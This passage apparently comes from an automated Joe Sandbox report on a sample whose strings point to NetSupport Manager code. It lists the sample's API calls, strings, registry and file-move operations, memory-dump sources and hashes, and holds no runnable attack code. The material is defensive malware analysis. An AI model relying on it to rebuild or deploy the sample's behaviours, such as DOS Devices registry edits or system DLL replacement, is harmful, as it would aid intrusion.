                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 74472576-4108050209
                                                                                                                        • Opcode ID: dcc2c8a77b7b349de0fbb904539f5b9a99ef37657bacbde28b80be283ab89ac8
                                                                                                                        • Instruction ID: 51123d3125fd918f02ee6d5b84aeb0275aef27d13803ddd39ee90017b365b31e
                                                                                                                        • Opcode Fuzzy Hash: dcc2c8a77b7b349de0fbb904539f5b9a99ef37657bacbde28b80be283ab89ac8
                                                                                                                        • Instruction Fuzzy Hash: D521B071801218ABCB219FA4DC8DBEEB7BCEB48304F5041D9F509A7191DBB85B84CFA0
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A600
                                                                                                                        • wsprintfW.USER32 ref: 00B1A61A
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A630
                                                                                                                          • Part of subcall function 00B155B0: GetTickCount.KERNEL32 ref: 00B15618
                                                                                                                          • Part of subcall function 00B1A0F0: GetCurrentThreadId.KERNEL32 ref: 00B1A103
                                                                                                                          • Part of subcall function 00B1A0F0: wsprintfW.USER32 ref: 00B1A183
                                                                                                                          • Part of subcall function 00B1A0F0: IsBadReadPtr.KERNEL32(?,00000001), ref: 00B1A1A8
                                                                                                                          • Part of subcall function 00B1A0F0: wsprintfW.USER32 ref: 00B1A1C9
                                                                                                                          • Part of subcall function 00B1A0F0: wsprintfW.USER32 ref: 00B1A1E6
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A662
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00B1A665
                                                                                                                        • GetVersion.KERNEL32 ref: 00B1A670
                                                                                                                        • ExitProcess.KERNEL32 ref: 00B1A6B3
                                                                                                                          • Part of subcall function 00AFFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 00AFFF66
                                                                                                                          • Part of subcall function 00AFFF40: GetProcAddress.KERNEL32(00000000), ref: 00AFFF6D
                                                                                                                          • Part of subcall function 00AFFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 00AFFF83
                                                                                                                          • Part of subcall function 00B159F0: SetEvent.KERNEL32(00000208), ref: 00B15A0B
                                                                                                                        Strings
                                                                                                                        • Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump., xrefs: 00B1A614
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CurrentDebugErrorLastOutputProcessString$AddressCountEventExitHandleModuleProcReadThreadTickVersion
                                                                                                                        • String ID: Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump.
                                                                                                                        • API String ID: 465577698-2858110079
                                                                                                                        • Opcode ID: 16f9cc57f8c82202c2a59fa74d0e8675ce33ef34c6293e777ab85b85541ef456
                                                                                                                        • Instruction ID: 68bc0cc6a1230720bd481d3683776a9219c9586a0f2d8ee0547999ee87778b32
                                                                                                                        • Opcode Fuzzy Hash: 16f9cc57f8c82202c2a59fa74d0e8675ce33ef34c6293e777ab85b85541ef456
                                                                                                                        • Instruction Fuzzy Hash: AC119A75910314BBDB10BBE49D4AFDA77ACAF08710F4040D5F619A72D3EAB4AD40CBA6
                                                                                                                        APIs
                                                                                                                        • UnDecorator::UScore.LIBCMT ref: 00B4E2AA
                                                                                                                        • DName::DName.LIBCMT ref: 00B4E2B6
                                                                                                                          • Part of subcall function 00B4BF81: DName::doPchar.LIBCMT ref: 00B4BFB2
                                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 00B4E2F5
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E2FF
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E30E
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E31A
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E327
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                        • String ID: void
                                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                                        • Opcode ID: b9dba41cc55965a23be8883cb6d3f3369340f701a810cc67b01a88abed27e3a7
                                                                                                                        • Instruction ID: 9cc6f6ce07f0c865b3a7162dd8082fb4bff1e8300b873498ef2155d44214a81e
                                                                                                                        • Opcode Fuzzy Hash: b9dba41cc55965a23be8883cb6d3f3369340f701a810cc67b01a88abed27e3a7
                                                                                                                        • Instruction Fuzzy Hash: 21115E70904204AEDB06EF68C89AAB9BBE0EF10700F0440D9F11AAB2E6DB70DB45DB40
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,0000042C), ref: 00B2472F
                                                                                                                          • Part of subcall function 00B23B00: SetWindowLongW.USER32(?,000000FC,?), ref: 00B23B0D
                                                                                                                        • _malloc.LIBCMT ref: 00B2474C
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _memset.LIBCMT ref: 00B24779
                                                                                                                        • __fread_nolock.LIBCMT ref: 00B2478A
                                                                                                                        • SendMessageW.USER32(00000000,0000000C,00000000,00000000), ref: 00B24798
                                                                                                                        • _free.LIBCMT ref: 00B2479F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeapItemLongMessageSendWindow__fread_nolock_free_malloc_memset
                                                                                                                        • String ID: buf$e:\nsmsrc\nsm\1410\1410\nt\winst32.c
                                                                                                                        • API String ID: 2839252642-821064217
                                                                                                                        • Opcode ID: e17b6de80a5dec5431f236f0ad6d6daf78f8492e9d8d9b63e2e7e02d8a5c1101
                                                                                                                        • Instruction ID: 0fdabfb6a8f88416ad641175147dd7a176f85664da9ed58385d77fcc093b25b0
                                                                                                                        • Opcode Fuzzy Hash: e17b6de80a5dec5431f236f0ad6d6daf78f8492e9d8d9b63e2e7e02d8a5c1101
                                                                                                                        • Instruction Fuzzy Hash: A0F0C8B2BC531536E92136646C8BF6F3ADCCF51F51F6040A0FB086A1C3DEE8590185B6
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00B6289E
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B628A8
                                                                                                                        • int.LIBCPMT ref: 00B628BF
                                                                                                                          • Part of subcall function 00AF0330: std::_Lockit::_Lockit.LIBCPMT ref: 00AF0341
                                                                                                                        • ctype.LIBCPMT ref: 00B628E2
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B628F6
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B62904
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 00B6291A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3532015510-3145022300
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00B62DB7
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B62DC1
                                                                                                                        • int.LIBCPMT ref: 00B62DD8
                                                                                                                          • Part of subcall function 00AF0330: std::_Lockit::_Lockit.LIBCPMT ref: 00AF0341
                                                                                                                        • messages.LIBCPMT ref: 00B62DFB
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B62E0F
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B62E1D
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 00B62E33
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 2525416601-3145022300
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00AFE5E0: LoadLibraryW.KERNEL32(USER32), ref: 00AFE5F9
                                                                                                                        • GetDC.USER32(00000000), ref: 00AFE75C
                                                                                                                        • LoadLibraryW.KERNEL32(USER32,\gdihook5.dll), ref: 00AFE76E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00AFE780
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFE793
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AFE79C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressFreeProcRelease
                                                                                                                        • String ID: EnumDisplayMonitors$USER32$\gdihook5.dll
                                                                                                                        • API String ID: 959129003-2682909438
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00B36886
                                                                                                                        • GetLastError.KERNEL32 ref: 00B36892
                                                                                                                        • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00B368C5
                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00B368D7
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 00B368EB
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B36908
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 00B3695E
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00B3696A
                                                                                                                        • RaiseException.KERNEL32(C06D007F,00000000,00000001,?,?,?), ref: 00B3699D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 991255547-0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B16F35
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B16F4A
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B16F4E
                                                                                                                        • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00B16F64
                                                                                                                        • SendMessageW.USER32(?,00000148,00000000,?), ref: 00B16F9D
                                                                                                                        • GetTextExtentPoint32W.GDI32(00000000,?,?,?), ref: 00B16FCF
                                                                                                                        • SendMessageW.USER32(?,00000160,?,00000000), ref: 00B17018
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B17022
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B1702B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ObjectSelect$ExtentPoint32ReleaseText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 583237262-0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06BB7
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00B06BEF
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06BFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocGlobalRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1459782005-0
                                                                                                                        APIs
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC18F
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1A9
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1B6
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1C3
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1D5
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1DF
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1F1
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1FB
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC208
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$Event$FileUnmapView
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427653990-0
                                                                                                                        • Opcode ID: 9658338d2bd0c9d43d32b1ba3b9d3c51b8f407f0723207572aeb4c003bf7e9e5
                                                                                                                        • Instruction ID: 0b5312c19ca5269b66d78988b45864f13208578e3d220db928b12a03e1160d6e
                                                                                                                        • Opcode Fuzzy Hash: 9658338d2bd0c9d43d32b1ba3b9d3c51b8f407f0723207572aeb4c003bf7e9e5
                                                                                                                        • Instruction Fuzzy Hash: F111ECB15007489FC7309FEA99C4866F7F8BE583203544E2EF286C3A51C674E8488E54
                                                                                                                        APIs
                                                                                                                        • _wcspbrk.LIBCMT ref: 00B03191
                                                                                                                          • Part of subcall function 00B02980: _memmove.LIBCMT ref: 00B02A2B
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove_wcspbrk
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$nsPrefix.IsA()$nsSuffix.IsA()$pszDelims!=0
                                                                                                                        • API String ID: 3207938814-3906421881
                                                                                                                        • Opcode ID: e5042e832a436b6a22b4008e6045f74db159d7f5d6d78aff9b93c1993235a4f0
                                                                                                                        • Instruction ID: 86fe0d03fc47f2d39a9c2d1dd94503d6e1ff39156f5ae2ccd2fbc116dbc70adc
                                                                                                                        • Opcode Fuzzy Hash: e5042e832a436b6a22b4008e6045f74db159d7f5d6d78aff9b93c1993235a4f0
                                                                                                                        • Instruction Fuzzy Hash: 35512A357A07026BDE10BF18DC6BE1937D9AFE5B04F1041D4F6016B3D2CA76AE0986D1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Close
                                                                                                                        • String ID: %s.Services
                                                                                                                        • API String ID: 2117561858-610773381
                                                                                                                        • Opcode ID: cb81f712d9195ac1c9f9d5c8109412d11e84fd98735ed60dd1dce4a4f7369f58
                                                                                                                        • Instruction ID: c75349ac3c6e1999f843e821370ae003f5199a64ee1fd922c39d1279d528c7a9
                                                                                                                        • Opcode Fuzzy Hash: cb81f712d9195ac1c9f9d5c8109412d11e84fd98735ed60dd1dce4a4f7369f58
                                                                                                                        • Instruction Fuzzy Hash: B051A0B1B00204AFDB14EBA4EC95FBA77B9EB98301F104549F90AC7290DE749D40CB92
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 00B22E94
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 00B22FB6
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000001), ref: 00B22FE0
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMove$DirectorySystem
                                                                                                                        • String ID: .dll$.old$.org
                                                                                                                        • API String ID: 2645207662-1297993771
                                                                                                                        • Opcode ID: 26fbe43747738f0b8692e2a4015368231ddd962bf5783ca9d9102f0f769b9a63
                                                                                                                        • Instruction ID: ca6c26fd2dc57ef708b18f3082870b23755525b3ca5f44280ead79f240e5e411
                                                                                                                        • Opcode Fuzzy Hash: 26fbe43747738f0b8692e2a4015368231ddd962bf5783ca9d9102f0f769b9a63
                                                                                                                        • Instruction Fuzzy Hash: 3551D07590021A8BCB20EF6CD955BA6B3F9EF88340F058594EE0ADB765E7709E41CB90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B06972
                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,00000104), ref: 00B069F8
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000), ref: 00B069FF
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00B06A32
                                                                                                                        • __wsplitpath.LIBCMT ref: 00B06A52
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$HandleSave__wsplitpath_memset
                                                                                                                        • String ID: BMP$X
                                                                                                                        • API String ID: 3358655634-1972070916
                                                                                                                        • Opcode ID: b6c98cb1020e5b6e5760d4eeed2752eaf7b3c39d701c3d07562354535020eab4
                                                                                                                        • Instruction ID: a3cd9e33bd6b24c51b60b80ec9637f08a10e3055ce9b9ee623742bc8210c3229
                                                                                                                        • Opcode Fuzzy Hash: b6c98cb1020e5b6e5760d4eeed2752eaf7b3c39d701c3d07562354535020eab4
                                                                                                                        • Instruction Fuzzy Hash: 2441C571A002189BDB20AF648C56BEB77F9EF84710F0481D9E909A7281EB759E64CB51
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2D8D
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2DB0
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00AF2E34
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF2E42
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2E55
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 00AF2E6F
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 2427920155-3145022300
                                                                                                                        • Opcode ID: b6ede2332fbef912da445ce5dc6d5277eed8ca296b8eac582beb64b70f2339e0
                                                                                                                        • Instruction ID: 41144f82ac3201fde53337079ba3410636474f4e60a8f305b2d137cf3255e6ec
                                                                                                                        • Opcode Fuzzy Hash: b6ede2332fbef912da445ce5dc6d5277eed8ca296b8eac582beb64b70f2339e0
                                                                                                                        • Instruction Fuzzy Hash: 2231B1719002089FCB14EF98D891FBE7BB4FB04720F244669F922A72A1DB74AD45CBD1
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,0002001F,?), ref: 00B22BD9
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 00B22C31
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22C50
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Strings
                                                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices, xrefs: 00B22BCF, 00B22BE3
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseLoadOpenStringValuewvsprintf
                                                                                                                        • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices
                                                                                                                        • API String ID: 1103474554-242128824
                                                                                                                        • Opcode ID: c038436acc3e8ca9de3eaa4c64cd068af4913c22835090a06acbd8193b5d03c6
                                                                                                                        • Instruction ID: acbfba83f6990f6f85b5a48135f0d3e65a4e6b59891f58a19d3f9efbbf802447
                                                                                                                        • Opcode Fuzzy Hash: c038436acc3e8ca9de3eaa4c64cd068af4913c22835090a06acbd8193b5d03c6
                                                                                                                        • Instruction Fuzzy Hash: E2219476A50124BBD7209BA8AC0AFBB77ECEF44B50F044195FD0CE7291D9B19D1097D0
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,5E06C67B), ref: 00B269CC
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,CurrentBuildNumber,00000000,?,?,?), ref: 00B26A0C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B26AB0
                                                                                                                          • Part of subcall function 00B38406: __fassign.LIBCMT ref: 00B383E3
